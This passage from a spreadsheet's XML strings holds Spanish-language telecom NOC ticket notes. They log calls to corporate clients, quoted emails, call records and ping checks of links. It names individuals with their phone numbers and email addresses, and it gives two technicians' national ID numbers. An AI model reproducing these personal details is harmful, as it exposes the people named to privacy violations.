  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001725061
**</t>
  </si>
  <si>
    <t>F4619974</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FERNANDO JUAREZ	30296744 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001710574</t>
  </si>
  <si>
    <t>F4619976</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 05:04
PARA: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
CC: PABLO FERNANDEZ (VENDOR) &lt;PABLO.FERNANDEZ@WALMART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF JOCOTAN ID: 344400166
BUENOS DÍAS ESTIMADOS SEÑORES CAM.
                EL TIEMPO DE MONITOREO HA FINALIZADO, PODRÍAN APOYARNOS EN VALIDAR EL FUNCIONAMIENTO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA ENLACE EN MONITOREO POR 12 HORAS, SE DEBE VALIDAR SERVICIO A LAS 21:45 HORAS DE HOY.</t>
  </si>
  <si>
    <t>F4619978</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. DIEGO CABRERA 42111939 NO SE LOGRO COMUNICACION IVR ENVIA A BUZON, ID: 2001683568.
DESDE EL PUNTO REMOTO TAMBIEN HAY CONEXION HACIA LA CENTRAL:
CC_VITATRAC_GT_ROOSEVELT#PING 192.9.200.254 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.9.200.254, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.9.212.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t>F4619981</t>
  </si>
  <si>
    <t>SE LLAMA ACLEITNE DENIS FLORES-54021693 ##NO CONTESTA""ENVIA A BUZON## SE INTENTARA NUEVAMENTE EN BREVE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS FLORES-54021693 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001714744</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIS FLORES-54021693 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001706295</t>
  </si>
  <si>
    <t>F4619988</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:02
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM0466
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM04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19988
ID: 47500972T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0466
UBICADO EN: ATM 466, BANRURAL JOCOTAN, BARRIO SAN SEBASTIAN, JOCOTAN CHIQUIMULA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4620011</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO DE AGENCIA PBX 23083000 EXT. 084921, NO SE LOGRA COMUNICACION
ID
3001398224
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:01:03
ESTADO: CONECTADA
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 1/07/2022 15:42:09</t>
  </si>
  <si>
    <t>SE LLAMA A LAS EXTENSIONES EXT. 084921 , 084911, SIN EMBARGO NO SE LOGRA COMUNICACION
ID
3001025718
COLA:
NOMBRE: A: 1720
NÚMERO: 23398888
DURACIÓN: 0:01:40
ESTADO: CONECTADA
DETALLES: 23398888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 29/06/2022 17:04:45</t>
  </si>
  <si>
    <t>SE LLAMA A SIGUIENTE NUMERO DE AGENCIA PBX 23083000 EXT.  084911, NO SE LOGRA COMUNICACION
ID
3001398716
COLA:
NOMBRE: A: 23083000
NÚMERO: 011 50223083000
DURACIÓN: 0:00:58
ESTADO: CONECTADA
DETALLES: +50223083000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 1/07/2022 15:43:59</t>
  </si>
  <si>
    <t>F4620019</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE NANCY PARA VALIDAR SI TUVO ALGUNA DESCONEXIÓN DE LA LLAMADA, PERO NO RESPONDE.
2001715823
COLA:
NOMBRE: A: 22319100
NÚMERO: 22319100
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22319100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 28/06/2022 11:29:42
2001715956
COLA:
NOMBRE: A: 22319100
NÚMERO: 22319100
DURACIÓN: 0:00:26
ESTADO: MARCANDO
DETALLES: 22319100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 28/06/2022 11:30:07</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA QUE CLIENTE HARÁ SUS PRUEBAS INTERNAS, SEGUIMIENTO PARA MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NANCY RODAS 22319100 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001179367</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NANCY RODAS 22319100 MENCIONA QUE NO HA PRESENTADO PROBLEMA CON LAS LLAMADAS
-ID 3001194590</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  NANCY RODAS  NO RESPONDE.
2001914725
COLA:
NOMBRE: A: 22319100
NÚMERO: 22319100
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 22319100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 29/06/2022 10:41:04
2001914880
COLA:
NOMBRE: A: 22319100
NÚMERO: 22319100
DURACIÓN: 0:00:23
ESTADO: MARCANDO
DETALLES: 22319100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 29/06/2022 10:41:58</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NANCY RODAS 22319100 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001211051</t>
  </si>
  <si>
    <t>F4620022</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SPLETI LUCERO AL 47401805 INDICA QUE YA LE DA ACCESO A INTERNET PERO ESTA DEMASIADO LENTO NO LE CARGAN LAS PAGINAS SE QUEDA ANALIZANDO NO LE DA ERROR NI NADA SOLO SE LE PONE PANTALLA GRIS DICE || SE NOTIFICA A GESTOR **
-ID 2001691674 - 2001691926
**</t>
  </si>
  <si>
    <t>F4620033</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO MARTINEZ AL 78741528 INDICA QUE NO SE ENCUENTRA EN SITIO SOLICITA QUE SE LE LLAME EN 1 HR NUEVAMENTE **
-ID 2001765425
**</t>
  </si>
  <si>
    <t>CLIENTE RICARDO MARTINEZ 78741528 UBICA EQUIPO ASMI54 EL CUAL SE ALARMA POR RATOS, CLIENTE INDICA QUE POSIBLEMENTE SU PBX ESTÉ FALLANDO PERO SOLICITA QUE SE CERTIFIQUE QUE A NIVEL DE COBRE NO SE TENGA INCONVENIENTES. SE LE INDICA QUE SE OBSERVAN ERRORES EN LA UM Y POR ESO LAS TRONCALES SE CAEN. SE ABRIRA WO PARA CERTIFICAR EL SERVICIO. ID DE LLAMADA: 2001701490</t>
  </si>
  <si>
    <t>CLIENTE RICARDO MARTINEZ AL 78741528 INDICA QUE YA REALIZÓ PRUEBAS CON EL SERVICIO Y VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4620038</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 14:33
PARA: JOAQUIN.COLORADO@GRUPOGBO.COM &lt;JOAQUIN.COLORADO@GRUPOGBO.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: GRUPO GBO, S.A. || IP2044043SV || SD1139372 || F4620038
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
NO SE TIENE RED LAN CONECTADA
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOAQUIN COLORADO 76716489 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE VALIDA CON GESTOR QUE NO SE TIENEN EQUIPOS INTERNOS CONECTADOS, CLIENTE INSISTE EN QUE SUS EQUIPOS ESTAN FUNCIONANDO BIEN, SE LE MENCIONA QUE SE ENVIARAN LAS PRUEBAS POR CORREO
-ID 2001771242</t>
  </si>
  <si>
    <t>F4620054</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTINA AL 70588234 INDICA QUE AUN NO CUENTA CON SERVICIO  || SE NOTIFICA
A GESTOR **
-ID 2001754072
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ULISES SANTOS 70588234   MENCIONA QUE SE ENCUENTRA EN SU HORA DE ALMUERZO POR LO QUE SOLICITA SEGUIMIENTO LUEGO DE LAS 13:15
-ID 2001737634</t>
  </si>
  <si>
    <t>F4620068</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:52
PARA: MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG &lt;MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG&gt;
CC: JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL SITIO: CC_IJSUD_GT_ESTACA_MONTSERRAT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0068
ID: 349900248T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_ESTACA_MONTSERRAT
UBICADO EN: INTERNET. - 3 CALLE 0-09 ZONA 1 MIXCO COL. LOMAS DE PORTUGAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4620070</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELICA - 52694804 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001787630</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELICA - 52694804 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 2001809292
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN AJIN 54331361 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA OTRO CONTACTO ANGELICA - 52694804 LLAMADA A PARTIR DE LAS  15:00 HRS PORQUE ESTA EN AREA CAJA
MENCIONA QUE SI NO SE TIENE RESPUESTA SE PUEDA VALIDAR CON EL ALGUN OTRO CONTACTO
-ID 2001739420</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE PARTE DEL CLIENTE CON PERMISOS, SE LE RESPONDE Y SE NOTIFICA A VELDIN.PALENCIA VIA SKYPE
DE: TIC GONZÁLEZ, ANIBAL [MAILTO:ANIBAL.GONZALEZ@BANRURAL.COM.GT]
ENVIADO EL: MIÉRCOLES, 29 DE JUNIO DE 2022 10:35
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AGE260@BANRURAL.COM.GT
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CAMILLO JOSE ALEMAN ENRIQUEZ &lt;CAMILLO.ALEMAN@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; ROGER ABSALON AGUILAR BATZ &lt;ROGER.AGUILAR@CLARO.COM.GT&gt;; ROBINSON ANDRE CASTILLO CARDONA &lt;ROBINSON.CASTILLO@CLARO.COM.GT&gt;
ASUNTO: RE: CLIENTE BANRURAL ID AFECTADO (8902213T)
BUEN DÍA
SE BRINDA ACCESO EN HORARIO DE 7:30 A 16:00 HRS.</t>
  </si>
  <si>
    <t>F4620076</t>
  </si>
  <si>
    <t>**SE LLAMO AL CLIENTE SAMUEL HERNANDEZ, 78589009 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001767519
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMUEL HERNANDEZ  AL 78589009 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001003066
**</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE SAMUEL HERNANDEZ QUIEN INDICO QUE SE QUEDO SIN LINEAS. SE LE SOLICITO CAMBIAR EL TIEMPO DE REGISTRO DE LA PBX A 3600.
CLIENTE INDICA QUE VA A VER EL TEMA CON EL PROVEEDOR Y SOLICITA QUE SE LLAME MAÑANA A LAS 9:00AM
2001816866
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:04:38
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 28/06/2022 17:22:23</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL HERNANDEZ 78589009 MENCIONA QUE PRESENTARON PROBLEMA CON LAS LLAMADAS, SE DEJA EN CONFERENCIA CON GESTOR
CLIENTE MENCIONA QUE EL MENSAJE DE ERROR ES: ERROR DE LLAMADA, TEMPORALMENTE NO DISPONIBLE
-ID 2001816107</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMUEL HERNANDEZ  AL 78589009 NO RESPONDE, ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO **
-ID 2001889009
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAMUEL HERNANDEZ  AL 78589009 INDICA QUE POR EL MOMENTO ESTA ESTABLE SOLICITA QUE SE LE DEVUELVA LLAMADA A LAS 15:30 PM**
-ID 2001911451
**</t>
  </si>
  <si>
    <t>**SE LLAMO AL CLIENTE SAMUEL HERNANDEZ, 78589009 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001770167
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SAMUEL HERNANDEZ,  QUIEN INDICA QUE POR MOMENTOS SE QUEDA SIN SERVICIO PERO REESTABLECE.
SE LE INDICO QUE POR PARTE DE CLARO NO SE OBSERVAN INCONVENIENTES, YA QUE EL SERVICIO VA POR FO.
SE LE SOLICITO CAMBIAR EL TIEMPO DE REGISTRO DE LA PBX. CLIENTE INDICA QUE VA A ESCALAR CON SU PROVEEDOR Y SOLICITA LLAMADA A LAS 14:00HRS.
&lt;LACUSVZXN1D1EID1&gt;PING -Q -C 1500 -S 1500 -M 10 -VPN IP_PBX 10.165.206.141
  PING 10.165.206.141: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.165.206.141 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/18 MS
&lt;LACUSVZXN1D1EID1&gt;</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SAMUEL HERNANDEZ 78589009 MENCIONA QUE YA NO VOLVIO A PRESENTAR PROBLEMA, PERO SOLICITA SE PUEDA ESTAR MONITOREANDO POR LO QUE SOLICITA LLAMADA PARA LAS 15:30
-ID 2001775471</t>
  </si>
  <si>
    <t>F4620077</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID GOMEZ 59980733   NO RESPONDE, SE VALIDA CON GESTOR QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001732415</t>
  </si>
  <si>
    <t>F4620105</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR DEONICIO 30167645 MENCIONA QUE PERSISTE EL INCONVENIENTE CON LA ENERGIA ELECTRICA
-ID 2001817973</t>
  </si>
  <si>
    <t>F4620114</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE CESAR DEONICIO 30167645 ID: 2001701806, CL INDICA QUE EN EL SITIO NO HAY ENERGIA ELECTRICA, SE NOTIFICA A JURGEN.BOCH VIA SKYPE | SE TERMINARA DE VALIDAR MEDIANTE SD CON  CL CENTRAL | WIP
*-*</t>
  </si>
  <si>
    <t>F4620119</t>
  </si>
  <si>
    <t>CLIENTE DANIEL HERNANDEZ  LLAMA DEL 42183753 ID 2001728758 PARA EL SEGUIMIENTO DEL CASO SD1139389 SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS SE TRANSFIERE CON EL GESTOR A CARGO JENSI CALGUA  AL 8126 ID 2001729849 SE DEJA EN LINEA CON EL CLIENTE, A LA ESPERA DE LOS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4620120</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE ANTONY GARCIA QUIEN INDICA QUE ENVIARA A PERSONAL PARA VALIDAR ESTADO DE UPS
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 11:35
FIN: HOY, 11:44
DURACIÓN: 8:47
ID DE LLAMADA: 2001932485</t>
  </si>
  <si>
    <t>PERSONAL DE TAVSA CONFIRMA ENVIO DE SUPERVISOR PARA EL DIA DE MAÑANA
OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;
BUEN DÍA:
CON GUSTO SE ESTARÁ ENVIANDO A UN SUPERVISOR A VALIDAR EL DÍA DE MAÑANA.
SALUDOS</t>
  </si>
  <si>
    <t xml:space="preserve">PERSONAL DE 5B SOLICITA REVISAR UPS A TAVSA
ORLANDO RAMIREZ &lt;ORAMIREZ@5B.COM.GT&gt;
TAVSA BUEN TARDE SU APOYO CON LO SOLICITADO POR CLARO.
ORLANDO RAMIREZ¿
ANALISTA DE ATMS
PBX: 2420¿7200
EXT.
2359
	</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE CON ESTADO DE LA REVISION DE USP
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE PARA EL ATM: ATM4643, QUEDAMOS AL PENDIENTE DEL ESTADO DE LA REVISIÓN DE UPS SEGÚN SE SOLICITA EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4620140</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN CARLOS ROBLES AL 58794781  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001727597
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN CARLOS ROBLES AL 58794781 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001711899
**</t>
  </si>
  <si>
    <t>F4620141</t>
  </si>
  <si>
    <t>SE LLAMA A CLEITNE SANDOR CUNI 78562326 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001803596</t>
  </si>
  <si>
    <t>F4620153</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. RONALD SOLIS, 5715-0578 NO CONTESTA IVR ENVIA A BUZON, 2001719649.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. RONALD SOLIS 5715-0578 NO CONTESTA ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001732229
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONALD SOLIS 57150578 QUIEN AMABLEMENTE INDICA QUE PUEDE APOYAR EN REALIZAR LAS PRUEBAS PERO NO LOGRA UBICAR LOS EQUIPOS, SE SOLICITAN DATOS DE VISITA
-ID 2001908868
NOMBRE DEL CLIENTE: BANCO DE DESARROLLO RURAL, S.A.
UBICACIÓN:BARRIO EL CENTRO, FRENTE AL PARQUE MUICIPAL DE SANSARE EL PROGRESO
CONTACTO EN SITIO: RONALD SOLIS, 57150578
HORARIO DE ATENCION:8:30 - 17:00 HRS
GESTIÓN DE PERMISOS:DATOS A LA CENTRAL</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:14
PARA: ANIBAL.GONZALEZ@BANRURAL.COM.GT &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO DE DESARROLLO RURAL, S.A. || AGE.272 || F4620153
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE                                  IBM                DPI
AMILCAR HERNANDEZ     597799               2610-58835-0201
LUDIN HERRERA                598577               2710-6695-419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SR. RONALD SOLIS 5715-0578 NO CONTESTA IVR ENVIA A BUZON, ENLACE CAIDO, SE NECESITAN REALIZAR DESCARTES DE PRIMER NIVEL... 2001721509.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. RONALD SOLIS 5715-0578 NO CONTESTA ENVIA A BUZON || SE INTENTARA LUEGO**ID 2001752124
**</t>
  </si>
  <si>
    <t>F4620154</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HERBER GARZONA AL 24526540  CONTESTA EL SEÑOR JULIO MARTINEZ INDICA QUE NO LE CARGAN LAS PAGINAS SOLO PUEDE ENVIAR CORREOS|| SE NOTIFICA A GESTOR**
-ID 2001732699 - 200735086
**</t>
  </si>
  <si>
    <t>F4620155</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL CORADO, AL 2504-1501 - EXT. 028021 Y 028011  NO RESPONDE | SE INTENTARA LUEGO**
-ID 2001757542
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL CORADO, AL 2504-1501 - EXT. 028021 NO RESPONDE | SE INTENTARA LUEGO**
-ID 2001737934
**</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE SAUL CORADO 25041501 - EXT. 028021 Y 028011 ID: 2001759983 / 2001760176, SOLICITA SE LE LLAME A 48442065 / ALLAN GONZALEZ,  SE DEJA EN CONFERENCIA CON YENSI.CALGUA PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4620159</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MONTEJO AL 58064113 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001760631
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERICK MONTEJO AL 58064113 NO RESPONDE ENVIA A BUZON DE VOZ DIRECTO **
-ID 2001739140
**</t>
  </si>
  <si>
    <t>F4620160</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JHOTAN SANCHEZ 42116235 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001720560 - 2001720769</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE JHOTAN SANCHEZ 42116235 ID: 2001725739 / 2001726202
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT, SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | SE TERMINARA DE VALIDAR MEDIANTE SD | WIP</t>
  </si>
  <si>
    <t>F4620161</t>
  </si>
  <si>
    <t>CORREO ENVIADO
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: MARTES, 28 DE JUNIO DE 2022 12:57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KEVYN.FONSECA@CLARO.COM.GT &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO CC_FUNDGENESIS_GT_MAZATENANGO_08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ODERLES CONTACTAR Y HACER PRUEBAS.
TICKET: F4620161
ID: 245700167T
IDENTIFICADOR DEL CLIENTE: CC_FUNDGENESIS_GT_MAZATENANGO_08
UBICADO EN: REDUNDANCIA.- CALLE PROLONGACION 1-57 ZONA 2, 1ER. NIVEL, EDIFICIO SAN BARTOLOME MAZATENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4620164</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ASTRID ROMERO AL 89906225  NO RESPONDE ENVIA A  BUZON || SE INTENTARA LUEGO**
-ID 2001740986
**</t>
  </si>
  <si>
    <t>F4620165</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO LOS ACCESOS DE PERSONAL TECNICO
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 12:51
